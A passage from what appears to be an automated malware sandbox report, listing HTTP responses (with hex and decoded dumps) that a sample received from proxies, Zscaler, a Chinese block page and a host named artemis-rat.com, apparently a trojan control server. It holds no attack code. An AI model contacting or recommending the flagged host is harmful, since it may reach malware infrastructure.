3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 61 36 61 36 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 64 61 74 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 70 61 73 73 77 6f 72 64 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 78 74 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 69 6d 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 75 72 6c 5d 2c 20 73 65 6c 65 63 74 2c 20 74 65 78 74 61 72 65 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 36 32 36 32 36 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 2
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: MyWebServer/3.6.20 Unicode (By TGY)Date: Mon, 11 Mar 2024 02:30:43 GMTContent-Type: text/html; Charset=GB2312Content-Length: 154Connection: Keep-AliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 3e 3c 68 33 3e 4d 79 57 65 62 53 65 72 76 65 72 2f 33 2e 36 2e 32 30 20 55 6e 69 63 6f 64 65 20 28 42 79 20 54 47 59 29 3c 2f 68 33 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1><hr><h3>MyWebServer/3.6.20 Unicode (By TGY)</h3></center></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Mon, 11 Mar 2024 02:30:44 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Mon, 11 Mar 2024 02:30:45 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Mon, 11 Mar 2024 02:30:45 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Mon, 11 Mar 2024 02:30:45 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlServer: Zscaler/6.2Cache-Control: no-cacheAccess-Control-Allow-Origin: *Content-length: 13607Data Raw: 3c 21 2d 2d 23 20 49 64 3a 20 63 6c 6f 73 65 64 70 72 6f 78 79 2e 68 74 6d 6c 20 32 38 35 31 34 34 20 32 30 32 31 2d 30 36 2d 31 36 20 30 35 3a 30 32 3a 30 36 5a 20 73 7a 68 61 6e 67 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 63 2e 6f 72 67 2f 54 52 2f 31 39 39 39 2f 52 45 43 2d 68 74 6d 6c 34 30 31 2d 31 39 39 39 31 32 32 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 5a 73 63 61 6c 65 72 20 6d 61 6b 65 73 20 74 68 65 20 69 6e 74 65 72 6e 65 74 20 73 61 66 65 20 66 6f 72 20 62 75 73 69 6e 65 73 73 65 73 20 62 79 20 70 72 6f 74 65 63 74 69 6e 67 20 74 68 65 69 72 20 65 6d 70 6c 6f 79 65 65 73 20 66 72 6f 6d 20 6d 61 6c 77 61 72 65 2c 20 76 69 72 75 73 65 73 2c 20 61 6e 64 20 6f 74 68 65 72 20 73 65 63 75 72 69 74 79 20 74 68 72 65 61 74 73 2e 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 74 69 74 6c 65 3e 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 62 79 20 5a 73 63 61 6c 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 76 61 72 20 64 65 66 4c 61 6e 67 20 3d 20 27 65 6e 5f 55 53 27 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 3c 69 6d 67 20 61 6c 74 3d 22 5a 73 63 61 6c 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 7a 73 63 61 6c 65 72 74 68 72 65 65 2e 6e 65 74 2f 69 6d 67 5f 6c 6f 67 6f 5f 6e 65 77 31 2e 70 6e 67 22 3e 2d 2d 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 33 65 33 65 33 3b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 0a 63 6f 6c 6f 72 3a 23 34 42 34 46 35 34 3b 0a 7d 0a 61 20 7b 0a 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0a 63 6f 6c 6f 72 3a 23 30 30 39 64 64 30 3b 0a 7d 0a 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0a 7d 0a 74 64 20 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 7d 0a 69 6d
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Mon, 11 Mar 2024 02:30:46 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlServer: Zscaler/6.2Cache-Control: no-cacheAccess-Control-Allow-Origin: *Content-length: 13597Data Raw: 3c 21 2d 2d 23 20 49 64 3a 20 63 6c 6f 73 65 64 70 72 6f 78 79 2e 68 74 6d 6c 20 32 38 35 31 34 34 20 32 30 32 31 2d 30 36 2d 31 36 20 30 35 3a 30 32 3a 30 36 5a 20 73 7a 68 61 6e 67 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 63 2e 6f 72 67 2f 54 52 2f 31 39 39 39 2f 52 45 43 2d 68 74 6d 6c 34 30 31 2d 31 39 39 39 31 32 32 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 5a 73 63 61 6c 65 72 20 6d 61 6b 65 73 20 74 68 65 20 69 6e 74 65 72 6e 65 74 20 73 61 66 65 20 66 6f 72 20 62 75 73 69 6e 65 73 73 65 73 20 62 79 20 70 72 6f 74 65 63 74 69 6e 67 20 74 68 65 69 72 20 65 6d 70 6c 6f 79 65 65 73 20 66 72 6f 6d 20 6d 61 6c 77 61 72 65 2c 20 76 69 72 75 73 65 73 2c 20 61 6e 64 20 6f 74 68 65 72 20 73 65 63 75 72 69 74 79 20 74 68 72 65 61 74 73 2e 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 74 69 74 6c 65 3e 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 62 79 20 5a 73 63 61 6c 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 76 61 72 20 64 65 66 4c 61 6e 67 20 3d 20 27 65 6e 5f 55 53 27 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 3c 69 6d 67 20 61 6c 74 3d 22 5a 73 63 61 6c 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 7a 73 63 6c 6f 75 64 2e 6e 65 74 2f 69 6d 67 5f 6c 6f 67 6f 5f 6e 65 77 31 2e 70 6e 67 22 3e 2d 2d 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 33 65 33 65 33 3b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 0a 63 6f 6c 6f 72 3a 23 34 42 34 46 35 34 3b 0a 7d 0a 61 20 7b 0a 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0a 63 6f 6c 6f 72 3a 23 30 30 39 64 64 30 3b 0a 7d 0a 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0a 7d 0a 74 64 20 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 7d 0a 69 6d 67 20 7b 0a 6d
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 11 Mar 2024 02:30:46 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 281Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service Unavailable
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Mon, 11 Mar 2024 02:30:46 GMTContent-Type: text/html;charset=utf-8Content-Length: 3699X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from hostX-Cache-Lookup: NONE from host:3128Connection: closeData Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 